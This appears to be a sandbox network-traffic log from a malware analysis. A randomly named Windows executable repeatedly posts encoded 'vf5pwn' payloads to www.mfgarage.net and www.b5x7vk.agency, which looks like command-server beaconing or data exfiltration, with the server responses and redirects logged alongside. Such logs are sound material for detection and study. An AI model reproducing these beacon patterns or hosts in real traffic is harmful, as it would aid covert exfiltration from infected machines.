                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 26 76 66 35 70 77 6e 3d 56 52 43 4e 68 30 4e 57 30 47 67 7a 58 6a 4a 2b 45 39 6b 42 63 41 71 7a 43 65 47 44 52 59 75 4c 4b 36 67 69 2f 33 31 4f 49 2f 48 4c 56 7a 33 65 64 4c 4f 46 50 67 66 42 57 49 49 46 49 31 79 76 34 4b 6e 48 64 5a 2f 42 79 43 41 64 52 72 4f 77 32 39 43 70 75 37 74 73 57 75 57 33 4a 51 61 56 77 70 74 54 36 65 76 79 4c 32 6f 47 68 4f 2f 62 67 46 2b 36 38 76 37 65 57 68 74 65 43 53 6c 63 36 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A=="}</script></head></html>


                                              Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 49740 | Destination IP: 85.153.138.113 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:45.915941954 CEST | Bytes transferred: 769 | Direction: OUT | Data: POST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 74 6e 67 58 65 67 70 41 34 64 79 48 31 67 48 31 72 36 56 36 45 4a 50 55 67 71 51 71 34 6c 41 58 66 66 51 62 30 4e 45 54 69 59 53 52 51 79 48 31 34 69 4e 34 4a 70 45 49 78 4f 65 53 6f 75 51 59 6e 35 48 6e 4e 69 46 62 52 49 61 72 65 46 46 73 56 6e 67 4c 32 58 50 46 56 72 6e 47 59 43 51 7a 58 68 63 6b 56 32 77 35 66 46 35 65 4f 58 2b 2f 64 39 36 67 68 36 41 4a 4e 32 4d 68 44 6c 33 70 58 67 4f 76 54 58 70 79 58 2f 46 61 65 52 37 64 44 62 6c 63 64 47 62 30 34 6a 46 71 47 70 6a 6c 6d 6d 76 65 63 53 62 2f 53 54 46 74 58 5a 54 30 67 55 2b 6d 47 64 67 7a 33 32 45 3d
                                              Data Ascii: vf5pwn=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdGb04jFqGpjlmmvecSb/STFtXZT0gU+mGdgz32E=
                                              Timestamp: Sep 26, 2024 15:24:46.626456976 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=4; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=NHg4BqL7wDHwBOu066f5609e; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=SAK8pcFeK0h0ZNnnTb4oj1KbqYU-kVZeJWadpNDPtZnk5Yfd-abH3vhqOyzh50WGBAU-dj8cOTAuHIXot8mkMw; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=6ycNnU58-QJSkYk1yuY0skxgM5-ErPYxJD9lyyF1Lw3XPtCbVQ70Zxk2siwKkZyIatPnGqGBHC_p-cRSPbdhsQ; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GkGDpr9nQmiS0sQJx7yc2BWX0aqgg61q5QvyQK2U-JxnR61g4_WMwt16S31DmjRhrg_FkOIImOeU0HdZXpnkiGgZYn_oZkQsxAjdG1g9PT-F9FM5cWUSlLE_JnpzS7XTZRtXweClVL2Y7oXHUWcLh0cKuEGa3g4nzhuFCSXSAPStUexRpumW_EXDHrVQHu0p8fBDvGiryQa3Ox5svL9H8VopznG7VBWWIlYS1igtEogL4qybQJXeS-6S0XA1JRhnRRV0cbHRFA8OBZAzblR3xdLykpggxtoOytSZXyJKAOgGruVXfXUHxj7p6T6ZVJHP6KupuhpaE7-M
                                              Data Raw:
                                              Data Ascii:
                                              Timestamp: Sep 26, 2024 15:24:46.626894951 CEST | Bytes transferred: 404 | Direction: IN | Data Raw: 73 34 34 77 51 4f 71 50 55 39 68 67 4e 69 32 61 32 6b 4e 30 6c 54 70 2d 78 36 4b 64 68 32 74 78 5f 58 55 65 39 65 42 6b 72 77 7a 41 6d 4d 56 6f 33 77 38 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70 69 72
                                              Data Ascii (second 404-byte chunk of the same 302 response, not an HTTP 404: the tail of the csid Set-Cookie value followed by the remaining headers, line breaks restored): s44wQOqPU9hgNi2a2kN0lTp-x6Kdh2tx_XUe9eBkrwzAmMVo3w8; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:46 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfga


                                              Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 49741 | Destination IP: 85.153.138.113 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:48.466774940 CEST | Bytes transferred: 789 | Direction: OUT | Data: POST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 55 58 66 2b 67 62 31 50 67 54 68 59 53 52 66 53 48 70 31 43 4e 7a 4a 70 59 41 78 4c 2b 53 6f 75 45 59 6e 38 6a 6e 4e 52 74 59 54 59 61 6c 54 6c 46 69 52 6e 67 4c 32 58 50 46 56 72 79 72 59 43 49 7a 58 77 73 6b 55 54 4d 36 57 6c 35 5a 47 33 2b 2f 5a 39 36 73 68 36 41 72 4e 33 67 50 44 6e 50 70 58 6b 4b 76 54 47 70 7a 64 2f 46 51 51 78 36 65 4b 5a 49 34 61 56 33 6a 38 7a 41 7a 56 61 58 35 75 77 43 30 47 77 54 58 42 7a 70 56 48 4b 62 44 78 6b 66 50 63 2b 77 44 70 68 51 36 56 57 4f 44 5a 4f 74 56 2b 64 71 4b 64 4e 71 69 47 79 68 6e
                                              Data Ascii: vf5pwn=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzpVHKbDxkfPc+wDphQ6VWODZOtV+dqKdNqiGyhn
                                              Timestamp: Sep 26, 2024 15:24:49.257050991 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=366; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=DkvsQmOvgvhnznmI66f560a1; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=pZTApRTrzbtQ9MxS-jIiKifC2OJ9dacAx8SBJKM1sN7_wNP_9dnN4CXiv18Fg4QbLW7ZBiyQibE2-H5S7Gjj1g; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=-pvdtGI6HGsFN4gyUDuIw6EhvXWyQMgVHEuKghVGqJjmZAkLUXIHxm_kp9cQAeT9-0-IY93KsdL66kVi9gLS1g; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=59OzB0Tlwb_G5hvaR_KZ01R8cW7VLWa-HixXLInE3_pjFka7KYa0Xd0zV89Ts8lbOrd_mgnnP4s6uO582nRgW-l0agUty6MyT80Pzrg87jhvkYHACUWh5nXDPXjKpAAdbHenJ6PGhdaZLYaeTC0IFZfAom5D2Dnb-6EN2XFW33-iKrAYdSDQw0X1SzQh0AfCtNjJCFZVEFT7NUY9Ev-hzgZ6H3IphiH8bZkplUxZxwsofFyVVWTqwzpL44at8bu-EU4czpyj9q-TnjGHyF0pbJojw-8axrlGLZn9FEFw24fJku9QUU9Rj4aOxiKLh4o2QXA_x_Wjck
                                              Data Raw:
                                              Data Ascii:
                                              Timestamp: Sep 26, 2024 15:24:49.258821964 CEST | Bytes transferred: 406 | Direction: IN | Data Raw: 46 4d 69 58 72 6e 42 58 33 35 58 65 39 73 5a 62 6a 51 36 59 61 36 4b 67 54 57 43 66 49 56 7a 72 47 76 39 48 38 42 4f 6f 7a 56 4e 4d 4c 74 71 4c 42 31 53 64 33 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii (second 406-byte chunk of the same 302 response, not an HTTP status: the tail of the csid Set-Cookie value followed by the remaining headers, line breaks restored): FMiXrnBX35Xe9sZbjQ6Ya6KgTWCfIVzrGv9H8BOozVNMLtqLB1Sd3; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:49 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 49742 | Destination IP: 85.153.138.113 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:51.057895899 CEST | Bytes transferred: 1806 | Direction: OUT | Data: POST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 4d 58 66 73 34 62 31 76 63 54 67 59 53 52 57 79 48 71 31 43 4e 71 4a 70 51 45 78 4c 7a 76 6f 71 30 59 68 61 76 6e 4c 67 74 59 5a 59 61 6c 61 46 46 6a 56 6e 67 6b 32 57 2b 4e 56 72 69 72 59 43 49 7a 58 79 30 6b 64 6d 77 36 51 6c 35 65 4f 58 2b 4a 64 39 36 41 68 36 59 52 4e 33 55 78 57 44 7a 70 5a 67 75 76 65 51 39 7a 65 66 46 65 54 78 36 38 4b 5a 45 6e 61 56 72 5a 38 77 63 5a 56 61 2f 35 2b 58 48 31 46 51 54 76 44 44 70 71 56 61 33 46 74 77 50 53 62 2f 38 56 74 52 51 35 49 69 47 65 65 4a 4d 54 31 4a 37 7a 42 35 6d 50 4f 33 30 53 4c 43 6e 63 4b 62 50 31 58 46 69 68 50 33 2b 65 75 72 35 4c 67 68 50 46 50 72 6f 47 33 62 6f 49 53 37 32 34 38 37 44 32 6f 66 33 64 56 52 6a 37 49 64 35 5a 6f 4d 62 33 6d 4e 51 6f 7a 42 70 30 4d 41 64 2f 2f 51 72 52 53 47 34 73 63 5a 72 30 65 4a 54 74 4c 36 48 48 47 36 46 39 5a 38 2b 57 6c 63 4b 62 44 76 50 6a 36 45 30 58 6b 31 61 [TRUNCATED]
                                              Data Ascii: vf5pwn=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 [TRUNCATED]
                                              Timestamp: Sep 26, 2024 15:24:51.979511023 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=914; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=MWSV1rK07ApLeHVO66f560a3; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=rGiFgeWcMo7hdE21j7f5X4WgoUteT_D-AhHHu4QI42cq2HPEYjhWqpNCaw3jLycyHWDIZ0bDmpOj7XqZpqXQhg; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=eToZDYQHwifnpV-wtGHaBdm83Jl2RVu_wcOvQCz3W4viCW4UQ_9rSnqd-UTLBbUydvHoXSE6xEo57D6lmyBAfg; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=TeAlEEGGm51SKWXsoCvmtYHZj0UHqJ8VFFpcW9sWZLaC8SRj4kj8jkBD10aiqlJKLqbkz6p-4J8CgieUOe7CtJsyQAJjIsApX-zQmTL1-xm1aQTcoxaqZlxOj4fnOd1E4_nMHX5kpOxG2u-j-vpFHN7Op0zL0Mmf45oYGfflUTd4sXmTE--ciNg9y93dkXFV6ohHiCXv5XTmCYr4L63aFgQdE_8liL0lZMoJIzH1hDqJltY-DaUYNI5qt4ZiPKs9ArwuvXLp3eGND8czUPRpp_0C5jmgn6GqjSbuMV3zr0Yg4vI68GqUTVeCVR6wizDryjXSLWDed-
                                              Data Raw:
                                              Data Ascii:
                                              Timestamp: Sep 26, 2024 15:24:51.979636908 CEST | Bytes transferred: 407 | Direction: IN | Data Raw: 45 64 69 4f 52 36 63 35 38 4e 58 4e 6a 78 68 57 61 46 47 6e 48 79 6c 4e 4f 45 63 31 57 46 52 34 42 4e 30 7a 44 74 6d 6c 58 65 46 46 57 33 61 7a 54 52 58 62 79 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii (second 407-byte chunk of the same 302 response, not an HTTP status: the tail of the csid Set-Cookie value followed by the remaining headers, line breaks restored): EdiOR6c58NXNjxhWaFGnHylNOEc1WFR4BN0zDtmlXeFFW3azTRXby; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:51 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID: 32 | Source IP: 192.168.2.5 | Source Port: 49743 | Destination IP: 85.153.138.113 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:53.900444984 CEST | Bytes transferred: 523 | Direction: OUT | Data: GET /3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mfgarage.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Timestamp: Sep 26, 2024 15:24:54.665582895 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=906; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=59akPmAiju8VRke566f560a6; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=FP3wKNEC8_6UcTj_kLzrzmPhlH1kv2JQVy-_RBTNrE5mhqBDrBKC0x9wrkRmqKxiE3IKQ66VNUgn4TU0-O69PQ; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=1KvE0CsvVmc6T3KV_KWQlOGccDjoNjP8fgpBeI4UCTiGnRfuwFGmI0bwc_8T5NjwkWJrxeCSSrwGGoOIjPAW1g; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=xCfm_eqbvUNNVgLiYquRyXgKWpzqAFoev_NQZjQgoPZlnUYj6sR98IItbPeZQ6k69PcyQxzKHxnDH-WDbQSPf-lR9WkpbgIY2I6yEtBOOe1QyNrsbsgvb5cbUI4gD21bSiCcwOvFMquTJgpOtlsGrXePzlGDSLLNmGlccI4mlb14vcQKko_GTf0c644Mvt2uLSWTNW-2WdRBdoy7L9JcvLt7AcAJ8MwU-J89RUGAO1cnZ6pzQ3vmbdKzXJo4d6jsWj2Q1KdrIaBYT-OzHCPdlCJwgynz_t3Y8tlJ7S3iSXJ80qhhB_92spxi7MdLZ31R7MRqQzXuJZ
                                              Data Raw:
                                              Data Ascii:
                                              Timestamp: Sep 26, 2024 15:24:54.666361094 CEST
                                              Bytes transferred: 583
                                              Direction: IN
                                              Data Raw: 33 6e 4a 43 57 5a 5a 34 61 55 61 57 71 31 52 61 65 78 59 5a 75 4e 49 7a 70 6f 2d 32 46 32 7a 61 78 32 61 38 43 43 48 59 6d 7a 76 6d 69 6d 38 64 6a 71 56 7a 72 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: 3nJCWZZ4aUaWq1RaexYZuNIzpo-2F2zax2a8CCHYmzvmim8djqVzr; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:54 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID: 33
                                              Source IP: 192.168.2.5
                                              Source Port: 49744
                                              Destination IP: 172.67.165.25
                                              Destination Port: 80
                                              PID: 2556
                                              Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:59.838757038 CEST
                                              Bytes transferred: 772
                                              Direction: OUT
                                              Data: POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 6d 6c 34 53 35 37 43 2b 76 61 6b 7a 7a 52 77 7a 54 4f 35 6e 36 49 54 37 69 37 54 54 76 52 69 52 42 69 7a 36 79 5a 4f 44 66 38 45 4f 79 31 37 34 48 72 78 71 50 58 38 66 32 41 50 6e 72 2b 33 4d 4f 54 41 45 4b 71 32 71 55 32 32 45 30 6c 62 72 69 69 34 56 37 61 43 6f 4a 4e 38 47 37 51 71 57 5a 42 6c 58 36 68 53 4c 6a 67 56 34 54 35 58 65 69 57 4f 62 76 30 57 64 59 6f 67 59 36 52 52 62 30 6a 35 61 6b 36 53 75 4d 55 2b 38 53 34 49 64 32 53 6f 57 44 77 69 6a 39 59 38 6f 56 51 51 41 35 50 4c 37 36 42 43 41 44 6d 74 58 65 65 4b 32 50 34 51 50 43 76 75 68 46 30 59 3d
                                              Data Ascii: vf5pwn=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDwij9Y8oVQQA5PL76BCADmtXeeK2P4QPCvuhF0Y=
                                              Timestamp: Sep 26, 2024 15:25:00.941833973 CEST
                                              Bytes transferred: 741
                                              Direction: IN
                                              Data: HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:00 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWVRwH4o6es9cjRv9KQrITzRg2KDIR%2BsbB4vGKVMxFspfW7ZdvE1tyPEK1GgciZs0GZxZGO43cv1FKkEn6nYLYyMI%2F88tCw8sF%2Fn6r8xIkK2ldEGGmP7x%2BIDIGGfKPcqDmY30A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393d46f097d0b-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                              Timestamp: Sep 26, 2024 15:25:00.941847086 CEST
                                              Bytes transferred: 5
                                              Direction: IN
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 34
                                              Source IP: 192.168.2.5
                                              Source Port: 49745
                                              Destination IP: 172.67.165.25
                                              Destination Port: 80
                                              PID: 2556
                                              Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:25:02.910291910 CEST
                                              Bytes transferred: 792
                                              Direction: OUT
                                              Data: POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 32 52 42 48 50 36 78 62 6d 44 4d 4d 45 4f 35 56 36 7a 5a 62 77 6b 50 58 77 39 32 46 50 6e 72 2b 54 4d 4f 54 77 45 4a 5a 75 70 55 6d 32 38 2f 46 62 74 73 43 34 56 37 61 43 6f 4a 4e 6f 67 37 51 43 57 59 78 31 58 37 43 4b 49 67 67 56 37 53 35 58 65 6d 57 4f 66 76 30 57 2f 59 6f 52 51 36 55 64 62 30 6a 4a 61 6b 50 75 74 58 6b 2b 36 4e 6f 4a 43 78 78 64 50 61 78 36 65 35 5a 35 75 44 6a 73 31 38 35 6d 52 67 6a 4b 6f 51 47 42 76 4f 4e 43 42 65 49 78 6d 59 4d 2b 52 62 6a 4d 37 51 52 76 36 4b 4f 78 71 73 66 6f 2b 7a 55 31 67 66 71 72 46
                                              Data Ascii: vf5pwn=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGBvONCBeIxmYM+RbjM7QRv6KOxqsfo+zU1gfqrF
                                              Timestamp: Sep 26, 2024 15:25:03.908273935 CEST
                                              Bytes transferred: 740
                                              Direction: IN
                                              Data: HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:03 GMT
